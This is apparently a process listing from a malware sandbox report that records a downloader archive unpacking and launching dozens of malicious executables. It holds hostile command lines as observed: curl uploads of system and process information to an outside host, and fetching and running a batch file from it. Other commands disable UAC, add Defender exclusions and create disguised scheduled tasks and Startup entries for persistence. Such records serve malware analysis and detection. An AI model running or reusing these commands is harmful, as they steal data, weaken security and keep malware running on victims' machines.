| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"
C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\Files\surfex.exe
"C:\Users\Admin\Desktop\Files\surfex.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\Files\Identification-1.exe
"C:\Users\Admin\Desktop\Files\Identification-1.exe"
C:\Users\Admin\Desktop\Files\87f3f2.exe
"C:\Users\Admin\Desktop\Files\87f3f2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe
"C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe"
C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp" /SL5="$30314,3849412,851968,C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"
C:\Users\Admin\Desktop\Files\onetap.exe
"C:\Users\Admin\Desktop\Files\onetap.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"
C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe
"C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe"
C:\Users\Admin\Desktop\Files\Mswgoudnv.exe
"C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\2DTJEUS2DTRQ" & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe"
C:\Users\Admin\Desktop\Files\Mswgoudnv.exe
"C:\Users\Admin\Desktop\Files\Mswgoudnv.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" "C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"
C:\Users\Admin\Desktop\Files\setup.exe
"C:\Users\Admin\Desktop\Files\setup.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\Files\svchost.exe
"C:\Users\Admin\Desktop\Files\svchost.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\svchost.exe'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe
"C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\S0HVS2V3W4E3" & exit
C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp133B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp133B.tmp.bat
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\Desktop\Files\wow.exe
"C:\Users\Admin\Desktop\Files\wow.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 336 -ip 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 336 -s 1732
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\O8GDJEKN7YCJ" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcc0f446f8,0x7ffcc0f44708,0x7ffcc0f44718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
